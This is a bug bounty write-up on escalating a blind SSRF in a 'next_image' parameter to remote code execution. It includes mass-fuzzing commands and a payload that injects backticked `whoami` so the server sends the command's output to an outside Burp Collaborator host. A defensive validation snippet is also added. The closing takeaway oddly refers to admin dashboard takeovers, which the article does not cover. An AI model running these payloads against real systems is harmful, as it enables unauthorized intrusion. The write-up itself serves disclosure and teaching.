Chaining a Blind SSRF Bug to Get an RCE

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India (Assam). In this article, I will be discussing how I was able to get RCE by using blind SSRF.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

Tools used for the exploitation:

  1. gf (tomnomnom) — https://github.com/tomnomnom/gf
  2. qsreplace (tomnomnom) — https://github.com/tomnomnom/qsreplace
  3. ffuf — https://github.com/ffuf/ffuf
  4. gau (Corben) — https://github.com/lc/gau
  5. waybackurls (tomnomnom) — https://github.com/tomnomnom/waybackurls

Background of the Vulnerability:

I always wonder why great bug bounty hunters always talk about chaining bugs. While doing some recon on a target using the web archive, I found a blind SSRF on the target in a parameter named “next_image”.

Now the actual hunting starts:

So, suppose the target name is example.com and all subdomains are also in scope, like this:

In Scope: *.example.com

While doing some recon on the target using the web archive, I extracted all the URLs from the web archive using waybackurls and gau. Here are the commands I used for that.

Commands used:

gau -subs example.com

waybackurls example.com

But there is still a chance that we will miss some URLs. So, in order to reduce the chance of missing URLs, we run waybackurls on all subdomains, grep out all the URLs containing parameters, sort them uniquely and save them in a file so that we can fuzz them for blind SSRF.

Command used:

{ gau -subs example.com; subfinder -d example.com -silent | waybackurls; } | gf ssrf | sort -u >> testblindssrf.txt

After grepping and sorting the URLs, we saved them in a file named “testblindssrf.txt”. Now we fuzz the URLs for blind SSRF using ffuf.

To receive the HTTP requests for blind SSRF I used my Burp Collaborator. But the testblindssrf.txt file had 900 URLs, so I used qsreplace to replace all parameter values with the Burp Collaborator server payload and fuzzed them with ffuf.

Command used:

cat testblindssrf.txt | qsreplace "http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net" >> ssrfuzz.txt

ffuf -c -w ssrfuzz.txt -u FUZZ -t 200

Now we check whether we get any HTTP request hit on our Burp Collaborator server. Fortunately, I got an HTTP hit on my Burp server from this URL:

Vulnerable URL:

http://devtest.example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net

Now it is time to escalate the blind SSRF to RCE:

As I was thinking about how I could escalate this blind SSRF, I suddenly remembered a post on Twitter. I can’t remember the name of the user who posted the tip, but I tried the payload to check for RCE.

The payload was:

http://devtest.example.com/import/picture?next_image=http://4v0er435p7gx4lx6432c7bdylprff4.burpcollaborator.net?`whoami`

When I opened the link in my browser, I got an HTTP request on my Burp server with the “whoami” command having been executed, as shown in the image.

PoC for blind SSRF to RCE

I quickly reported the bug, and the report was triaged as critical.
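
On the defensive side, the behaviour above (the server fetches whatever next_image points to, and backticks in the value get executed) is what you see when a user-supplied URL is pasted into a shell command. The following is an added example, not code from this write-up or from the target: it validates next_image against an allowlist, rejects hosts that resolve to internal addresses, and builds an argument list so the URL is never parsed by a shell. The allowlisted host names, the function names and the use of curl as the downloader are assumptions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: the only hosts the picture import legitimately needs (constructed).
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
DEFAULT_PORT = {"http": 80, "https": 443}


def resolve(host):
    """Return the set of IP addresses a host name resolves to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_next_image(url, resolver=resolve):
    """Validate a next_image URL; return (host, port, ip) or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORT:
        raise ValueError("scheme not allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL")
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError("host not on allowlist")
    port = parts.port or DEFAULT_PORT[parts.scheme]
    if port != DEFAULT_PORT[parts.scheme]:
        raise ValueError("port not allowed")
    addrs = sorted(resolver(host))
    # Even an allowlisted name must not point at internal address space.
    if not addrs or not all(ipaddress.ip_address(a).is_global for a in addrs):
        raise ValueError("host resolves to a non-public address")
    return host, port, addrs[0]


def fetch_argv(url, resolver=resolve):
    """Build an argument list for subprocess.run(argv), never a shell string."""
    host, port, ip = check_next_image(url, resolver)
    return ["curl", "--silent", "--proto", "=http,https", "--max-redirs", "0",
            "--max-time", "5",
            # Pin the validated address so a second DNS answer cannot differ.
            "--resolve", f"{host}:{port}:{ip}",
            "--url", url]
```

Because the list is passed to subprocess.run without shell=True, a value such as `whoami` in the query string stays literal data inside one argument.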

Takeaway

I’m sure that a lot of security researchers have already seen this process, but this is how I approach accessing admin dashboards, and I have reported many in bug bounty programs using this process. I hope this will help you find more admin dashboard takeovers.

That’s one of the reasons why I wanted to share my experience, and also to highlight other techniques to exploit such vulnerabilities.

Support me if you like my work! Buy me a coffee and follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996
